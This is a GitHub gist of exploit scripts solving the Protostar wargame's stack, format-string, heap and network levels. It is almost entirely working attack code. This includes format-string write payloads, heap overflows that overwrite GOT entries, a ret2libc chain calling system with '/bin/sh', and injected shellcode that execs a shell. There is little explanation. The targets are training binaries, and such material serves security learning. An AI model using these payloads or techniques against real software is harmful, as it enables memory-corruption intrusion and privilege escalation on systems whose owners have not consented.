Last active
June 14, 2018 09:32
-
-
Save Creased/2f1e4ec59b747f8f49201666c1f4eebc to your computer and use it in GitHub Desktop.
Protostar Stack Overflow (0-7), Format String (0-4), Heap Overflow (0-3) and Net (0-2)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
export TMP=$(mktemp -d) | |
/bin/cat <<-EOF >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 0 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
def x(s): | |
s = s.encode("hex") | |
s = [s[i:i + 2] for i in range(0, len(s), 2)] | |
x = "" | |
for c in s: | |
x += str('\\\') + 'x' + str(c) | |
return x | |
OFFSET = 64 | |
FLAG = 0xdeadbeef | |
payload = '%{offset}c{flag}'.format(offset=OFFSET, | |
flag=p(FLAG)) | |
print payload | |
EOF | |
./format0 $(python ${TMP}/exploit.py) | |
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 1 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
PTR = 0x8049638 | |
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format1 'AAAA%'$i'$08x')"; done | grep AAAA41414141 | |
# trying 143 - AAAA41414141 | |
OFFSET = 143 | |
payload = '{ptr}%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET) | |
print payload | |
EOF | |
/opt/protostar/bin/format1 "$(python ${TMP}/exploit.py)" | |
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 2 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
PTR = 0x80496e4 | |
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format2 <<<'AAAA%'$i'$08x')"; done | grep 414141 | |
# trying 4 - AAAA41414141 | |
OFFSET = 4 | |
payload = '{ptr}%60x%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET) | |
print payload | |
EOF | |
/opt/protostar/bin/format2 <<<"$(python ${TMP}/exploit.py)" | |
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 3 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
PTR = 0x80496f4 | |
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format3 <<<'AAAA%'$i'$08x')"; done | grep 414141 | |
# trying 12 - AAAA41414141 | |
OFFSET = 12 | |
FLAG = 0x01025544 | |
# Split FLAG to LSB & MSB | |
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8) | |
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)] | |
LSB = int(LSB, 16) | |
MSB = FLAG[- (len(FLAG) / 2):] | |
MSB = int(MSB, 16) | |
LSB += 65536 | |
LSB -= MSB | |
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1]) | |
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1) | |
print payload | |
EOF | |
/opt/protostar/bin/format3 <<<"$(python ${TMP}/exploit.py)" | |
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar format 4 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
PTR = 0x8049724 # objdump -d ./format4 | grep -P -A1 "^[0-9a-f]+ <exit@plt>:" | |
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format4 <<<'AAAA%'$i'$08x')"; done | grep 414141 | |
# trying 4 - AAAA41414141 | |
OFFSET = 4 | |
FLAG = 0x80484b4 # objdump -d ./format4 | grep -P "^[0-9a-f]+ <hello>:" | |
# Split FLAG to LSB & MSB | |
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8) | |
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)] | |
LSB = int(LSB, 16) | |
MSB = FLAG[- (len(FLAG) / 2):] | |
MSB = int(MSB, 16) | |
LSB += 65536 | |
LSB -= MSB | |
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1]) | |
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1) | |
print payload | |
EOF | |
/opt/protostar/bin/format4 <<<"$(python ${TMP}/exploit.py)" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
./heap0 "$(python -c "print('A'*76 + 'B'*4 + '\x64\x84\x04\x08')")" | |
# x/16wx 0x804a160 - 4 | |
# | |
# i1 = 0x804a160 | |
# i1->name = 0x804a170 | |
# i2 = 0x804a180 | |
# i2->name = 0x804a190 | |
# | |
# objdump -d ./heap1 | grep -P -A1 "^[0-9a-f]+ <puts@plt>:" | |
# 080483cc <puts@plt>: | |
# 80483cc: ff 25 74 97 04 08 jmp *0x8049774 | |
./heap1 $(python -c "print('A'*16 + 'B'*4 + '\x74\x97\x04\x08' + ' ' + '\x94\x84\x04\x08')") | |
python -c "print('auth test\nreset\nservice ' + 'A'*16 + '\nlogin')" | ./heap2 | |
# a = 0x804c008 | |
# b = 0x804c030 | |
# c = 0x804c058 | |
# | |
# b * 0x804890e | |
# r $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')") | |
# x/60wx 0x804c000 | |
# q | |
./heap3 $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar net 0 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
from pwn import * | |
import struct | |
DEBUG = False | |
def p(x): | |
return struct.pack('<I', x) | |
r = remote('192.168.204.3', 2999) | |
# Receive and extract challenge | |
# data = r.recvuntil('32bit int\n', drop=False) | |
data = r.recvline_pred(lambda line: '32bit int\n' in line, keepends=False, timeout=1) | |
if DEBUG: print(data) | |
data = re.match(r'Please send '"'"'(?P<integer>[0-9]+)'"'"'[^\n]+32bit int', data) | |
if DEBUG: print(data) | |
# Solve Challenge | |
integer = int(data.group('integer'), 10) | |
r.send(p(integer)) | |
# Get flag | |
data = r.clean(timeout=1) | |
print(data) | |
EOF | |
python ${TMP}/exploit.py | |
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar net 1 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
from pwn import * | |
import struct | |
DEBUG = False | |
def u(x): | |
return struct.unpack('<I', x)[0] | |
r = remote('192.168.204.3', 2998) | |
# Receive and extract challenge | |
data = r.recv(1024, timeout=1) | |
if DEBUG: print(data) | |
# Solve Challenge | |
r.send(str(u(data))) | |
# Get flag | |
data = r.clean(timeout=1) | |
print(data) | |
EOF | |
python ${TMP}/exploit.py | |
export TMP=$(mktemp -d) | |
/bin/cat <<-'EOF' >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar net 2 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
from pwn import * | |
import struct | |
DEBUG = True | |
def p(x): | |
return struct.pack('<Q', x) | |
def u(x): | |
return struct.unpack('<I', x)[0] | |
r = remote('192.168.204.3', 2997) | |
sum = 0 | |
for _ in range(4): | |
# Receive and extract challenge | |
data = r.recv(4, timeout=1) | |
integer = u(data) | |
sum += integer | |
# Solve Challenge | |
r.send(p(sum)) | |
# Get flag | |
data = r.clean(timeout=1) | |
print(data) | |
EOF | |
python ${TMP}/exploit.py |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
./stack0 < <(python -c "print('A'*64 + 'abcd')") | |
./stack1 $(python -c "print('A'*64 + 'dcba')") | |
GREENIE=$(python -c "print('A'*64 + '\x0a\x0d\x0a\x0d')") ./stack2 | |
nm stack3 | grep win | awk '{print $1}' | |
./stack3 < <(python -c "print('A'*64 + '\x24\x84\x04\x08')") | |
nm stack4 | grep win | awk '{print $1}' | |
./stack4 < <(python -c "print('A'*64 + 'B'*12 + '\xf4\x83\x04\x08')") | |
gdb -q ./stack | |
r < <(echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA') | |
patts | |
r < <(python -c "print('A'*72 + 'B'*4 + '\x90'*16 + 'C'*120")) | |
x/12s $esp | |
q | |
echo 2 >/proc/sys/fs/suid_dumpable | |
ulimit -c unlimited | |
coredumpctl list | grep stack5 | |
coredumpctl info 31926 | |
lz4 -d /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000.lz4 | |
gdb -q ./stack5 -c /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000 | |
x/12s $esp | |
q | |
./stack5 < <(python -c "print('A'*76 + '\xf0\xcb\xff\xff' + '\x90'*16 + '\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x12\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x20\x79\x30\x75\x20\x73\x70\x33\x34\x6b\x20\x31\x33\x33\x37\x20\x3f\x20')") | |
export TMP=$(mktemp -d) | |
PATTERN=$(gdb -q ./stack6 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2) | |
echo "${PATTERN}\n" >${TMP}/inp | |
OFFSET=$(gdb -q ./stack6 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}') | |
SYSTEM=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p system' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//') | |
EXIT=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p exit' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//') | |
LIBC=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'info proc map' -ex 'q' | grep 'libc' | awk '{print $1" "$2}' | grep -Eo '0x[A-Fa-f0-9]+ 0x[A-Fa-f0-9]+' | head -n1 | perl -p -e 's/\n//') | |
SH=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'find "/bin/sh" '"${LIBC}" -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//') | |
/bin/cat <<-EOF >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar stack 6 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
def x(s): | |
s = s.encode("hex") | |
s = [s[i:i + 2] for i in range(0, len(s), 2)] | |
x = "" | |
for c in s: | |
x += str('\\\') + 'x' + str(c) | |
return x | |
SYSTEM = ${SYSTEM} | |
EXIT = ${EXIT} | |
OFFSET = ${OFFSET} | |
SH = ${SH} | |
payload = '{smash}{system}{exit}{sh}'.format(smash='A'*OFFSET, | |
system=p(SYSTEM), | |
exit=p(EXIT), | |
sh=p(SH)) | |
print payload | |
EOF | |
/bin/cat <(python ${TMP}/exploit.py) - | ./stack6 | |
gdb -q ./stack7 | |
disas __do_global_dtors_aux | |
# [..snip..] | |
# 0x08048492 <+82>: pop ebx | |
# 0x08048493 <+83>: pop ebp | |
# 0x08048494 <+84>: ret | |
# [..snip..] | |
q | |
export TMP=$(mktemp -d) | |
PATTERN=$(gdb -q ./stack7 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2) | |
echo "${PATTERN}\n" >${TMP}/inp | |
OFFSET=$(gdb -q ./stack7 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}') | |
/bin/cat <<-EOF >${TMP}/exploit.py | |
#!/usr/bin/env python | |
# -*- coding:Utf-8 -*- | |
#==========================================================# | |
# [+] Title: Exploitation code for Protostar stack 7 # | |
# [+] Author: Baptiste M. (Creased) # | |
# [+] Website: bmoine.fr # | |
# [+] Email: contact@bmoine.fr # | |
# [+] Twitter: @Creased_ # | |
#==========================================================# | |
import struct | |
def p(x): | |
return struct.pack('I', x) | |
def x(s): | |
s = s.encode("hex") | |
s = [s[i:i + 2] for i in range(0, len(s), 2)] | |
x = "" | |
for c in s: | |
x += str('\\\') + 'x' + str(c) | |
return x | |
OFFSET = ${OFFSET} | |
POP2RET = 0x80485f7 | |
EBX = '\x90'*4 | |
EBP = '\x90'*4 | |
SHELLCODE_PTR = 0xffffcbcc | |
SHELLCODE = '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' | |
payload = '{smash}{pop2ret}{ebx}{ebp}{shellcode_ptr}{shellcode}'.format(smash='A'*OFFSET, | |
pop2ret=p(POP2RET), # pop ebx ; pop ebp ;; | |
ebx=EBX, # ebx | |
ebp=EBP, # ebp | |
shellcode_ptr=p(SHELLCODE_PTR), | |
shellcode=SHELLCODE) | |
print payload | |
EOF | |
/bin/cat <(python ${TMP}/exploit.py) - | ./stack7 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment